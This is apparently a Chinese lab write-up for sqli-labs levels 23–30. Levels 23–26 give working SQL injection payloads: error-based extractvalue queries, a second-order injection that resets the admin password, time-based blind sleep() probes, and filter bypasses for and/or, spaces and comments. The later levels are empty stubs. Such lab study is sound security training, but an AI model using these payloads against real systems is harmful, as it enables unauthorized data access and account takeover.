sqli 靶场 Level23-Level30 wp

level-23 (注释被过滤)

  1. 抓包,查看正常请求和响应。

  2. 尝试是否存在注入

    • id=1’,id=1’',成周期性变化

    image-20231101115227628

  3. 尝试 POC

  • POC: id=1'+and+extractValue(1,concat(0x7e,user()))--+'

结果:failed。怀疑–被过滤掉了,尝试前后闭合方案

  • POC: id=1'+and+extractValue(1,concat(0x7e,user()))+and+'


​ 结果:ok。

level-24(二次注入)

这一关是用类admin的账号去修改admin的密码。
思路如下:
(1)我们注册一个admin'-- admin'#admin' and '1admin' or '1 的账号。这是第一次注入
(2)我们通过这个账号修改密码来修改隐藏的admin账户的密码。这是第二次注入
第一个'在这里是为了闭合前面的'
-- 后者#这里起到注释的效果
列出更改密码的sql更好理解:

usernamesql
admin'-- update table_x set pasword='123' where username='admin'-- ' and password='456;
admin'#update table_x set pasword='123' where username='admin#'-- ' and password='456;
admin' and '1update table_x set pasword='123' where username='admin#'-- ' and password='456;
admin' or '1update table_x set pasword='123' where username='admin#'-- ' or password='456;
  1. 注册账号
    在这里插入图片描述
    注意--后面是有空格,否则起不到注释的效果

  2. 登录新账号修改密码(456)
    在这里插入图片描述

  3. 验证(密码456)
    在这里插入图片描述
    在这里插入图片描述
    ==》 成功登录admin

level-25 (and、or被过滤)

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

    ''存在

  3. 尝试POC

  • POC:id=-1'+or+extractValue(1,concat(0x73,user()))--+

发现and,or关键字被屏蔽了,还是不区分大小写的屏蔽


  • 使用union

结果:成功注入

  • 使用aandnd/anandd --> and

POC: id=-1'+aandnd+extractValue(1,concat(0x73,user()))--+

level-25a(and、or被过滤盲注)

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  • POC:id=1' and if(1,sleep(3),sleep(0))--+

    ==》不休眠

  • POC:id=1" and if(1,sleep(3),sleep(0))--+

    ​ ==》休眠

==》存在注入

  1. 尝试POC

    • step1: 猜字符串长度:POC: id=1+aandnd+if(length(user())=§1§,sleep(3),0)--+

​ ==》14

  • step2:猜每个字符: POC: id=1+aandnd+if(substr(user(),§1§,1)='§a§',sleep(3),0)--+

​ ==》root@localhost

level-26 (空格、注释被过滤)

  1. 抓包,查看正常请求和响应

  1. 尝试是否存在注入
  • 使用单双引号,发现输出周期性变化,存在注入
  1. 尝试POC
  • POC: '+union+select+1,user(),3--+

==> 空格被过滤了


==》 因为空格被过滤了,所以and,union都使用不了,--+也使用不了
寻找其他替代方案:&&替代and,后’闭合替换--+

  • 尝试
    POC: id=1'&extractvalue(1,concat(0x7e,user(),0x7e))&' //字符串拼接&
    在这里插入图片描述
    ==》 无反应
    POC: id=1'&&extractvalue(1,concat(0x7e,user(),0x7e))&&' //逻辑&&
    在这里插入图片描述

POC: id=1'%26extractvalue(1,concat(0x7e,user(),0x7e))%26' //字符串拼接,&使用%编码
在这里插入图片描述
==》 成功爆出

POC: id=1'%26%26extractvalue(1,concat(0x7e,user(),0x7e))%26%26' //&&使用%编码
在这里插入图片描述

==》 成功爆出

POC: id=1'|extractvalue(1,concat(0x7e,user(),0x7e))|' //使用|
在这里插入图片描述
==》 成功爆出

POC: id=1'||extractvalue(1,concat(0x7e,user(),0x7e))||' //使用||
在这里插入图片描述
==》 成功爆出

POC: id=1'%7cextractvalue(1,concat(0x7e,user(),0x7e))%7c' //|使用%编码
在这里插入图片描述
==》 成功爆出

POC: id=1'%7c%7cextractvalue(1,concat(0x7e,user(),0x7e))%7c%7c' //||使用%编码
在这里插入图片描述
==》 成功爆出

  1. 总结
    • 空格别过滤了,试试&,&&,|,||以及他们的%编码
    • 因为空格被过滤了,不能使用--+

level-26a ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

level-27 ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

level-27a ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

level-28 ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

level-28a ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

level-29 ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

level-30 ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/129489.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

创建javaEE项目(无maven),JSP(九大内置对象)、Servlet(生命周期)了解

一、Servlet和jsp 0.创建web项目(无maven): 1.创建一个普通的java项目 2.项目根目录右键,添加模板 3.配置tomcat服务器 4.配置项目tomcat依赖 1.Servlet(Server Applet)服务端小程序 用户通过浏览器发送一个请求,服务器tomcat接收到后&…

基于nodejs+vue 网上商城系统系统-毕业设计

目 录 摘 要 I ABSTRACT II 目 录 II 第1章 绪论 1 1.1背景及意义 1 1.2 国内外研究概况 1 1.3 研究的内容 1 第2章 相关技术 3 2.1 nodejs简介 4 2.2 express框架介绍 6 2.4 MySQL数据库 4 第3章 系统分析 5 3.1 需求分析 5 3.2 系统可行性分析 5 3.2.1技术可行性:…

乌班图 Linux 系统 Ubuntu 23.10.1 发布更新镜像

Ubuntu 团队在其官网上发布了Ubuntu 23.10.1 版本,这是目前较新的 Ubuntu 23.10(Focal Fossa)操作系统系列的第一个发行版,旨在为社区提供最新的安装媒体。Ubuntu 22.04 LTS(Focal Fossa)操作系统系列于 2022 年 4 月 21 日发布。 Ubuntu 23.10 LTS(长期支持版本)可用…

Win10/Win11总是自动更新,如何关闭自动更新?

参考:https://www.zhihu.com/search?q%E5%85%B3%E9%97%ADwindows%E8%87%AA%E5%8A%A8%E6%9B%B4%E6%96%B0&search_sourceSuggestion&utm_contentsearch_suggestion&typecontent 手动关闭 1 Windows服务 1.1 WinR输入services.msc打开服务 1.2 找到Windows Update…

hugetlb核心组件

1 概述 hugetlb机制是一种使用大页的方法,与THP(transparent huge page)是两种完全不同的机制,它需要: 管理员通过系统接口reserve一定量的大页,用户通过hugetlbfs申请使用大页, 核心组件如下图: 围绕着…

日本it培训学费 想去日本做IT,需要具备哪些技术?

日本的IT行业历史比较悠久,业务以上层前端业务为主,如设计和构建软件。日本IT公司组织庞大,行业内部有着严格的分工和部署,工作会被细分化,分配给个人的工作量不会太大,难度也不会很高,所以日本…

设计模式之装饰模式--优雅的增强

目录 概述什么是装饰模式为什么使用装饰模式关键角色基本代码应用场景 版本迭代版本一版本二版本三—装饰模式 装饰模式中的巧妙之处1、被装饰对象和装饰对象共享相同的接口或父类2、当调用装饰器类的装饰方法时,会先调用被装饰对象的同名方法3、子类方法与父类方法…

【TS篇一】TypeScript介绍、使用场景、环境搭建、类和接口

文章目录 一、TypeScript 介绍1. TypeScript 是什么1.2 静态类型和动态类型1.3 Why TypeScript1.4 TypeScript 使用场景1.5 TypeScript 不仅仅用于开发 Angular 应用1.6 前置知识 二、如何学习 TypeScript2.1 相关链接 三、起步3.1 搭建 TypeScript 开发环境3.2 编辑器的选择3.…

音频修复增强软件iZotope RX 10 mac中文特点

iZotope RX 10 mac是一款音频修复和增强软件。 iZotope RX 10 mac主要特点 声音修复:iZotope RX 10可以去除不良噪音、杂音、吱吱声等,使音频变得更加清晰干净。 音频增强:iZotope RX 10支持对音频进行音量调节、均衡器、压缩器、限制器等处…

[概述] 点云滤波器

拓扑结构 点云是一种三维数据,有几种方法可以描述其空间结构,以利于展开搜索 https://blog.csdn.net/weixin_45824067/article/details/131317939 KD树 头文件:pcl/kdtree/kdtree_flann.h 函数:pcl::KdTreeFLANN 作用&#xff1a…

一个 不用氪金 也能让你变强的 VSCode 插件 Ai

哈喽,大家好 我是 彩色之外👨🏻‍💻。今天给大家推荐一款不用充钱也能让你变强的 vscode 插件 通义灵码(TONGYI Lingma),可以称之为 Copilot 的替代甜品 💪 👀 前期回顾 NPM- 滚动进…

贷款行业极难获客,怎么获取实时客户数据?

我们能想象当客户有贷款需求时会发生什么吗? 客户可能会打开手机搜索“如何借款”、“哪笔贷款利息低”、“最多能借多少钱”、“贷款需要什么条件”等关键词,然后,客户点击进入第一个链接,然后填写他们的姓名和电话号码来测试他…

OpenAI最新官方GPT最佳实践指南,一文讲清ChatGPT的Prompt玩法

原文:Sina Visitor System OpenAI的官网发表万字GPT最佳实践指南,讲清Prompt提示词的原则和策略,这里是总结和全文翻译 原创图像,AI辅助生成 OpenAI的官网上刚刚发表一篇万字的GPT最佳实践指南,这份指南把写好Promp…

大语言模型对齐技术 最新论文及源码合集(外部对齐、内部对齐、可解释性)

大语言模型对齐(Large Language Model Alignment)是利用大规模预训练语言模型来理解它们内部的语义表示和计算过程的研究领域。主要目的是避免大语言模型可见的或可预见的风险,比如固有存在的幻觉问题、生成不符合人类期望的文本、容易被用来执行恶意行为等。 从必…

C++笔记之实现多态的所有方法

C笔记之实现多态的所有方法 文章目录 C笔记之实现多态的所有方法1.C中多态是是什么?请用简洁准确的话描述2.虚函数实现多态2.1.虚函数(Virtual Functions)2.2.纯虚函数(Pure Virtual Functions)2.3.虚析构函数&#xf…

vue学习part01

02_Vue简介_哔哩哔哩_bilibili Vue.js - 渐进式 JavaScript 框架 | Vue.js (vuejs.org) 1.简介 2.常用用法 新项目一般vue3,老项目vue2 3.vue两种风格:选项式api(vue2)和组合式api(vue3) 两种方式实现累…

Scala集合操作

1 集合简介 Scala 中拥有多种集合类型,主要分为可变的和不可变的集合两大类: 可变集合: 可以被修改。即可以更改,添加,删除集合中的元素; 不可变集合类:不能被修改。对集合执行更改,…

基于单片机控制的GSM短信模块家庭防盗报警系统

博主主页:单片机辅导设计 博主简介:专注单片机技术领域和毕业设计项目。 主要内容:毕业设计、简历模板、学习资料、技术咨询。 文章目录 主要介绍一、内容1 设计任务和要求1 主要内容 二、系统总体方案2.1 系统整体设计思路2.2 系统方案设计 …

【入门Flink】- 03Flink部署

集群角色 Flik提交作业和执行任务,需要几个关键组件: 客户端(Client):代码由客户端获取并做转换,之后提交给JobManger JobManager:就是Fink集群里的“管事人”,对作业进行中央调度管理;而它获…

【ES专题】ElasticSearch 高级查询语法Query DSL实战

目录 前言阅读对象阅读导航前置知识数据准备笔记正文一、ES高级查询Query DSL1.1 基本介绍1.2 简单查询之——match-all(匹配所有)1.2.1 返回源数据_source1.2.2 返回指定条数size1.2.3 分页查询from&size1.2.4 指定字段排序sort 1.3 简单查询之——…